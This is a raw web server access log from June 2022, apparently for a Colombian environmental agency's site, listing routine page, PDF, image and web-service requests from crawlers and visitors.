207.46.13.134 - - [08/Jun/2022:21:29:04 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
172.22.2.4 - - [08/Jun/2022:21:28:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.67 - - [08/Jun/2022:21:30:32 -0500] "GET /portaldeninos/2021/06/29/jasbleady-castaneda-una-mujer-que-le-pone-el-alma-a-la-proteccion-de-las-tinguas-azules/ HTTP/1.1" 200 108589
157.55.39.198 - - [08/Jun/2022:21:30:35 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
157.55.39.215 - - [08/Jun/2022:21:30:37 -0500] "GET /portaldeninos/humedal-el-tunjo/ HTTP/1.1" 200 87862
172.22.2.4 - - [08/Jun/2022:21:29:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
201.245.192.253 - - [08/Jun/2022:21:31:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46692
216.245.221.92 - - [08/Jun/2022:21:33:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Jun/2022:21:32:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47850
172.22.2.4 - - [08/Jun/2022:21:33:50 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=6733&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1122
181.60.40.95 - - [08/Jun/2022:21:33:52 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.60.40.95 - - [08/Jun/2022:21:33:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 387946
172.22.2.4 - - [08/Jun/2022:21:34:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:21:35:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
40.91.112.108 - - [08/Jun/2022:21:37:00 -0500] "GET /galeria/galeria/fotos/Entrenube3G.jpg HTTP/1.1" 200 138221
45.173.6.6 - - [08/Jun/2022:21:36:59 -0500] "GET /portaldeninos/residuos/ HTTP/1.1" 200 87644
216.245.221.92 - - [08/Jun/2022:21:38:00 -0500] "HEAD / HTTP/1.1" 200 -
69.171.251.21 - - [08/Jun/2022:21:38:50 -0500] "GET /images/Naturalista1.jpeg HTTP/1.1" 200 202073
157.55.39.127 - - [08/Jun/2022:21:40:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%20351-400/00000393.tif HTTP/1.1" 200 38146
172.22.2.4 - - [08/Jun/2022:21:39:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61903
172.22.2.4 - - [08/Jun/2022:21:40:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Jun/2022:21:41:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46692
172.22.2.4 - - [08/Jun/2022:21:40:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56364
172.22.2.4 - - [08/Jun/2022:21:42:52 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
216.245.221.92 - - [08/Jun/2022:21:43:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:21:43:00 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [08/Jun/2022:21:42:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47850
207.46.13.137 - - [08/Jun/2022:21:44:43 -0500] "GET /BLA/resoluciones/00001415.tif HTTP/1.1" 404 1018
172.22.2.4 - - [08/Jun/2022:21:45:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [08/Jun/2022:21:48:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:21:46:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
207.244.104.183 - - [08/Jun/2022:21:52:31 -0500] "GET / HTTP/1.1" 200 319
34.147.78.116 - - [08/Jun/2022:21:52:56 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [08/Jun/2022:21:53:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:21:51:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.82.181.21 - - [08/Jun/2022:21:54:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [08/Jun/2022:21:52:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60581
186.82.181.21 - - [08/Jun/2022:21:54:17 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.82.181.21 - - [08/Jun/2022:21:54:17 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [08/Jun/2022:21:57:12 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
64.227.3.157 - - [08/Jun/2022:21:57:10 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
216.245.221.92 - - [08/Jun/2022:21:57:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:21:57:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45003
172.22.2.4 - - [08/Jun/2022:21:57:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:21:58:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60581
216.245.221.92 - - [08/Jun/2022:22:02:59 -0500] "HEAD / HTTP/1.1" 200 -
186.155.201.115 - - [08/Jun/2022:22:04:05 -0500] "GET /bla/resoluciones/notificaciones/registros%202018/0470.pdf HTTP/1.1" 200 268447
186.155.201.115 - - [08/Jun/2022:22:04:06 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [08/Jun/2022:22:03:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:22:04:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
170.78.42.69 - - [08/Jun/2022:22:07:56 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
170.78.42.69 - - [08/Jun/2022:22:07:56 -0500] "GET /images/mujeres-reverdecen-4-junio.jpg HTTP/1.1" 200 59432
216.245.221.92 - - [08/Jun/2022:22:07:59 -0500] "HEAD / HTTP/1.1" 200 -
170.78.42.69 - - [08/Jun/2022:22:08:40 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
40.91.120.140 - - [08/Jun/2022:22:08:43 -0500] "GET /galeria/galeria/fotos/diaSC6.jpg HTTP/1.1" 200 117970
40.77.167.79 - - [08/Jun/2022:22:10:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0689.pdf HTTP/1.1" 200 220155
172.22.2.4 - - [08/Jun/2022:22:09:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:22:10:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [08/Jun/2022:22:12:59 -0500] "HEAD / HTTP/1.1" 200 -
191.108.29.79 - - [08/Jun/2022:22:14:19 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
191.108.29.79 - - [08/Jun/2022:22:14:19 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
191.108.29.79 - - [08/Jun/2022:22:14:21 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
191.108.29.79 - - [08/Jun/2022:22:14:22 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
191.108.29.79 - - [08/Jun/2022:22:14:26 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
191.108.29.79 - - [08/Jun/2022:22:14:26 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
191.108.29.79 - - [08/Jun/2022:22:14:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/bPCkoEBcHEhkyVIbAWLNNuOPFuhTRMJJXGMf0hcyunZqBH2SPG4TO1RkBbonzhZYE9jLYpKrdeuckWF/0/VTi6z5tDg3hQRO6sqVV5FEZODWVFPsl0tnMuEbuorhjuNGDVQ5gJBPWRet+z3kKNjUTnJEZeO4RPKntKDdivyu/BD4oy/ZD0Q1yHZoRURVqoTmla6AvTrkrtgJo4DgTuwHxXtvBdAWbnomGYV8gJ9kNqEWVVd8rdhQhlRgkzffzn10kpN96d+5PwA==&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+2OAyZW2RbYpP4l7soRbZTzkIzZZ3KBmFIZQZwoR0Ql1Xl99YMK2p5zPDM21YAGUht/4a9LWTIaLHgIRu1zSzj1zc9aIo8hDw2ubV4R2ycImFhw1zskoRn8GOguS63NDs7qB3hGFR3QcpmRBJ31qQIdX6RZHEznARVjhGkz1bTKnDknynyg0zkphTJWbko6yZIaVoaCsDO/9FTZAty/cE+iT2aOWrL4iEmCl3UbYzWKtfY68Gg0JlHZt03pbGn81yYV5aKrkGJwpZU4VFQnAXBUoO/MEeH4afxVmEaUOOYgg5hScKIpAGB2j8Y3WMB6PhMV5eH/Nkb9P8bjKaGASUkIxcUt63lLRUvGhXTyxyQfWPzMqCKpGj43cskvkAsiM7w9uJ4366XRoZffKUvC9WT8k0Ikpba9U86SGtT+4Aee9bdvjknGfuwCuRuiuH/GUMtLp+f4Z11bM4cV06KbGz4zqcVgsGClORHZNrTtadd7oqntzU1WvsK62nnrxWjEbOvqfbqT7rKyZklDC6lBY54rpSku19KFvmaatM7vbJ0Cm+pLWJzZEZjz3dclEpukg9gEH1ogAZWehGkhQJsRdCG/IfAYS/d3g7lT5e2gbg+Sch6o4xRcx6Adys4wnGkdGOlFJuiGf2V7+Q7QJ/7FdJ5n7ragh0N7CqZ6LA3sxQVXDi65mV5UVO+ZDDivrhWCX8K1UeRwhGUSkP4EhfyyOaAJG0nM6jo7GckxyB0k0EtUULojXjDz/kMnSh9Va1iAVwT2KCXj8+/i/YiVhyrHkPFhfN3WGzPi+DuYCzfE4xLzIkXziUr1Wovq89rD0c7YXScp7vncnUyS8wyI8Rbb1RC0uZuw60Rud+by1TVhH71w92w2Rp+w8782YXiojdWzkpnGFy6D0ywDRbM/+qdNyUnXPjq6wdqYt/SKLghOWJqKVOloBC2hZuq7YHXNFaWvPDMCF02/FaqR9TZKJuil8r0NrzW7v17d9axjwJuKCvH+Bm5iJu962+mOFw/k0N+rLI9R82nWHwVz5Ez5WZyuAvMHsict0iaFr0=&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/HyUl0OhuFuFhI6uFh2lOZd8ApouaMZpR9tjb5MIiuPmF5h4kCYetQnUQn+mYBvwqGu4po728KP4UhpZWAfD7xo/06rgcbdWl0YseqgYiiT2NmkA8QIui5m5LGtJNCOcELB8ou+dKkAs9kIPQoGlPwtIke2PVNu7E=&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/8zcT0ZxT64gHm/ylKR/pwx+Jkfm5bcnue7P2t20KkOf+blnVN/pXPdNt6/InuVygxq44ubwb5e8HiT+X0JtiDmUI/xeUFsabLoiNE5aYcEeGFfiGcirLoM1h5UxK93jAns4SlXI5bvm2a1/mCVIgVgVCOEmq+Hos=&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+kGMvZPSSWZxmPv/IFt9iVNbRYfdXlZ9kjh9JEHa1U1i0xF/oV/PNVHVcBZVoATcO2n4eJesDxPSjXr8bswgm+OpUpvob+tHWOTHi7n0P3UPBzZx08gQ1zu8UbaTOmtneLs9vUwltMfemU1CqUTcLNjJusIJ/5jqU=&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19XUi2DcmnJE2N2M0qlrFB2qqmynDtbvBGEevciUmkzY92NCyGSPff/UUg6qthayttH6rJsn3ljjSc+mEh2YUP4+nOzEFwLVdt0YgZVDYr2Ivt7PqICzLtHAsbx4KMxE3QiM67YGmhsooPpN4F7RiGY+XN7GhefXq9p/u1t4DNinpvQaKh6z8LiYooG0E2BldDJzysdfM0pLA==&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19SgbmGtxl1cihJuFJQoO/QAkdDAaIH60tbBDaeK15Plr9/AZ0Ft7YstN+Kf+k9RkSXO3igSVdIy+tFUshz8Wx91SHOgFNb+3PRtepTCFXsXoSa4CP01XMh91xbGd9cGRMsLf+Ku6ICBEz8NAG2S4DCYB8kXJ7xl5Qk6H4lEb/gxg1tnbrX20xsao4XoJPuE9YS28tNG0tcDg==&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/+qgmDYrYrdLxSwQJCOk+HDLHTOy1VFHIy17Sj/KFzNxpLdSOYizcnR+87YXxXzaU6P5YasBHDROyCZ9GbHVCvDXEOwhx/eJNjYDxAKaiRPi/CeXUB7X5lJagca/tFEa3uNw34pLpZ3ZHIYDzLofFK//2dCAAVVFPCyyHvpiXL1MZ54Z6+n8zT&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18F+bFGxXQQIqx3C3IeAa91B/+Tlnh6zDkgx6P7nnzWWvzBuUuvDuycwUZjfPIXK8Xpt1WgPVAE9gxPwtDJORspOYlQG+6PINGsY9oTHvrA0Z/rrpb8dJYUI8YNZc/stJq30yc9OE2fkvQY6qEm0Bjw4Y4+AfEbOCybX4hPEjjr3wrl7c/npYhqRVJdwAQ06wIwvHdHCL08mQ==&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/umRph3cdG27hItLgGHJ35TljpBVhZSZMmYkv5bp/Pi3wKlh4qObJ3MdyomJ0EmF/JsNGW8T7+VqOKp+R7iPvotZVv3JE83Ubv+OHQ8DpTzw85IWK7Iq9O4J/D4OPxSFLtEppPMwykucvNEcjNm+eSo4ZCkk9zrmKHBwDNub1hNkSyzW0MxuMu&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:38 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+kJoKzWau1N5J1O6wKzo9Qqei+baIZHbHrOB1RSl2MOFs6J5+xuG/ELZ7BInU3ig5WQhE9XBYWL6YLyJ5g9srcKe7uKwtITB4Iwk16YSGoYp48tZtV/rb2gtpthtMVzFymSk4gg/XGNXKP25+VNxe+t9pmsFpOSMNzhMrjYlaWaPcNhRiO6W7mBONUMPuww3Icwxwn1TssRw==&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.108.29.79 - - [08/Jun/2022:22:14:38 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/Bn+tlkYiiY01RUbEE//ZVtfLTIJx5zVG0QkRYwxQBJPvI6WO3VEwIqTLruc50WzYBq7BNZ0V3sA6FRQLZEGW73AUinhLlKD4zovosv9j7n2LtDv2fnmDlsoelM74M1aGgZtvghqXq3KdAD80wdZqfspPKaihiy4enuoeEKPKnK9lJpXd601flJAtvKKAzFi48gGRaFpPk6g==&u=U2FsdGVkX1+HDP2h++5OLmxqex/xjJNGfmqzELSjQZWMh9y6BE5S0p7Nwvklg6zN&y=U2FsdGVkX18OYpGIkeuCmxHkXZ+gKHnGgSqJbl+z1uESDTUijwnS03/KLP8QoLqB HTTP/1.1" 200 25
191.156.128.93 - - [08/Jun/2022:22:16:10 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
172.22.2.4 - - [08/Jun/2022:22:15:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:22:15:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [08/Jun/2022:22:17:59 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.15 - - [08/Jun/2022:22:18:44 -0500] "-" 408 -
40.77.167.21 - - [08/Jun/2022:22:19:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4474.pdf HTTP/1.1" 304 -
173.252.107.11 - - [08/Jun/2022:22:21:29 -0500] "GET /images/secretaria-rio-bogota-avances-12-mayo.jpg HTTP/1.1" 200 37281
201.245.192.253 - - [08/Jun/2022:22:21:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46561
172.22.2.4 - - [08/Jun/2022:22:20:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.156.183.60 - - [08/Jun/2022:22:22:37 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
186.84.21.95 - - [08/Jun/2022:22:22:44 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
216.245.221.92 - - [08/Jun/2022:22:23:00 -0500] "HEAD / HTTP/1.1" 200 -
186.84.21.95 - - [08/Jun/2022:22:23:00 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 345915
201.245.192.253 - - [08/Jun/2022:22:22:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47868
172.22.2.4 - - [08/Jun/2022:22:21:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.127 - - [08/Jun/2022:22:23:31 -0500] "GET /BLA/resoluciones/AUTOS%202018/3676.pdf HTTP/1.1" 200 343601
179.19.136.227 - - [08/Jun/2022:22:23:34 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
186.84.21.95 - - [08/Jun/2022:22:24:07 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 345915
40.77.167.79 - - [08/Jun/2022:22:25:34 -0500] "GET /catalogoisis/js/go.js HTTP/1.1" 200 364
207.46.13.67 - - [08/Jun/2022:22:25:36 -0500] "GET / HTTP/1.1" 200 319
191.156.185.117 - - [08/Jun/2022:22:25:45 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 304 -
103.234.250.131 - - [08/Jun/2022:22:26:00 -0500] "GET / HTTP/1.1" 200 319
103.234.250.131 - - [08/Jun/2022:22:26:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
103.234.250.131 - - [08/Jun/2022:22:26:00 -0500] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1018
103.234.250.131 - - [08/Jun/2022:22:26:01 -0500] "GET /apple-touch-icon.png HTTP/1.1" 404 1018
179.33.135.80 - - [08/Jun/2022:22:27:40 -0500] "GET /dia-mundial-del-medio-ambiente-con-3-500-beneficiarias-comienza-la-segunda-fase-de-mujeres-que-reverdecen.html HTTP/1.1" 200 845
216.245.221.92 - - [08/Jun/2022:22:27:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:22:26:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.245.70.127 - - [08/Jun/2022:22:29:12 -0500] "GET /ab2g HTTP/1.1" 400 946
157.245.70.127 - - [08/Jun/2022:22:29:12 -0500] "GET /ab2h HTTP/1.1" 400 946
172.22.2.4 - - [08/Jun/2022:22:27:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
13.77.163.14 - - [08/Jun/2022:22:30:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%20CONJUNTAS/Resolucion%20conjunta%20No.%20001-2017.pdf HTTP/1.1" 200 332456
13.77.163.14 - - [08/Jun/2022:22:31:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 200 474460
89.187.175.244 - - [08/Jun/2022:22:31:28 -0500] "GET /wp-login.php HTTP/1.1" 404 1035
172.22.2.4 - - [08/Jun/2022:22:31:28 -0500] "GET /BLA/boletinlegal/wp-login.php HTTP/1.1" 404 1038
172.22.2.4 - - [08/Jun/2022:22:31:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
201.245.192.253 - - [08/Jun/2022:22:31:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46561
172.22.2.4 - - [08/Jun/2022:22:31:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [08/Jun/2022:22:32:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:22:33:03 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%201%20del%2010%20de%20Abril%20de%202014.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Jun/2022:22:32:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47868
172.22.2.4 - - [08/Jun/2022:22:32:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:22:33:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54582
172.22.2.4 - - [08/Jun/2022:22:35:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63427
216.245.221.92 - - [08/Jun/2022:22:37:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Jun/2022:22:38:04 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [08/Jun/2022:22:38:05 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [08/Jun/2022:22:38:05 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [08/Jun/2022:22:38:05 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [08/Jun/2022:22:38:05 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [08/Jun/2022:22:38:05 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [08/Jun/2022:22:38:05 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [08/Jun/2022:22:38:05 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [08/Jun/2022:22:38:05 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [08/Jun/2022:22:38:05 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [08/Jun/2022:22:38:05 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [08/Jun/2022:22:38:06 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [08/Jun/2022:22:38:07 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [08/Jun/2022:22:38:07 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [08/Jun/2022:22:38:07 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [08/Jun/2022:22:38:07 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [08/Jun/2022:22:38:07 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
